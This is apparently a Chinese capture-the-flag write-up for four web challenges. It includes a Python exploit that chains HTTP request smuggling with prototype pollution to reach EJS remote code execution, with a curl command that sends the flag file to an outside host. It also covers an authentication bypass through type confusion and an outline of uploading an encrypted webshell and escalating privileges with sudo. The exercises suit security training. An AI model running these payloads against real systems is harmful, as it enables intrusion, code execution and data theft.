WEB

real_ez_node

在 route/index.js 中：

router.post('/copy',(req,res)=>{res.setHeader('Content-type','text/html;charset=utf-8')var ip = req.connection.remoteAddress;console.log(ip);var obj = {msg: '',}if (!ip.includes('127.0.0.1')) {obj.msg="only for admin"res.send(JSON.stringify(obj));return }let user = {};for (let index in req.body) {if(!index.includes("__proto__")){safeobj.expand(user, index, req.body[index])}}res.render('index');
})

copy 路由会检验 ip 地址是否为 127.0.0.1，且请求体不能有 __proto__。

router.get('/curl', function(req, res) {var q = req.query.q;var resp = "";if (q) {var url = 'http://localhost:3000/?q=' + qtry {http.get(url,(res1)=>{const { statusCode } = res1;const contentType = res1.headers['content-type'];let error;// 任何 2xx 状态码都表示成功响应，但这里只检查 200。if (statusCode !== 200) {

在 curl 路由中我们可以用http 请求走私来访问 copy 从而可以绕过 copy 路由里面的 ip 检测，然后利用constructor.prototype 替代 __proto__，最后打ejs就行了。
payload：

import urllib.parse
import requests
payload = ''' HTTP/1.1POST /copy HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Connection: close
Content-Length: 155{"constructor.prototype.outputFunctionName":"x;global.process.mainModule.require('child_process').exec('curl 192.168.10.104:12345/`cat /flag.txt`');var x"}
'''.replace("\n", "\r\n")def encode(data):tmp = u""for i in data:tmp += chr(0x0100 + ord(i))return tmppayload = encode(payload)
print(payload)r = requests.get('http://192.168.10.104:3000/curl?q=' + urllib.parse.quote(payload))
print(r.text)

Node Magical Login

flag1 可以利用 cookie 令 user=admin 获得。

function Flag1Controller(req,res){try {if(req.cookies.user === SECRET_COOKIE){res.setHeader("This_Is_The_Flag1",flag1.toString().trim())res.setHeader("This_Is_The_Flag2",flag2.toString().trim())res.status(200).type("text/html").send("Login success. Welcome,admin!")}if(req.cookies.user === "admin") {res.setHeader("This_Is_The_Flag1", flag1.toString().trim())res.status(200).type("text/html").send("You Got One Part Of Flag! Try To Get Another Part of Flag!")}else{res.status(401).type("text/html").send("Unauthorized")}}catch (__) {}
}

获得 flag2 的条件有两个，一个是 checkcode 的长度要是 16，另一个就是在转小写后要等于 aGr5AtSp55dRacer，但是这根本不可能，我们可以让它提前异常结束，也就是在 checkcode = checkcode.toLowerCase()处异常报错，那么我们可以令 checkcode 为一个数组，且长度为16。

function CheckController(req,res) {let checkcode = req.body.checkcode?req.body.checkcode:1234;console.log(req.body)if(checkcode.length === 16){try{checkcode = checkcode.toLowerCase()if(checkcode !== "aGr5AtSp55dRacer"){res.status(403).json({"msg":"Invalid Checkcode1:" + checkcode})}}catch (__) {}res.status(200).type("text/html").json({"msg":"You Got Another Part Of Flag: " + flag2.toString().trim()})}else{res.status(403).type("text/html").json({"msg":"Invalid Checkcode2:" + checkcode})}
}

payload:

{"checkcode":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]}

扭转乾坤

随便上传一个提示 content-Type 不行，我们只要令第一个 m 大写就可以了。

unusual php

没环境，就写一下流程吧。

通过 phpinfo 可以看到他使用了 ZendGuard 的加密工具。
可以通过 php.ini 来找到 ZendGuard 扩展的文件名，通过 phpinfo 找到扩展文件也就是 zend_test.so 的位置。（可以在extension_dir 中找到）。

之后通过脚本把扩展保存下来（也可以利用伪协议加密后，再解密，不容易漏字节），放到 ida 中找到 RC4 函数，里面有秘钥（abcsdfadfjiweur）。
使用秘钥加密一句话木马后上传文件，可以用 cyber 网站加密解密。

利用 sudo -l 查看可以执行的命令，利用 sudo chmod 777 /flag ，最后读取 flag。

docker

https://github.com/Randark-JMT/CTF_Archive/tree/main/2022%20xhlj

wp

http://www.hackdig.com/02/hack-904398.htm